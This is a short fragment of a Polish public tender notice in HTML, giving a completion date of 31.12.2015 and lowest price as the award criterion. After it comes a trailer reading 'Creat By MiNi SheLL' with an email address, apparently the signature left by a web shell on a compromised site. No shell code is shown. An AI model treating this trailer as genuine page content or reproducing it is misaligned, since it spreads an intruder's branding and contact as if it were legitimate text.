<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com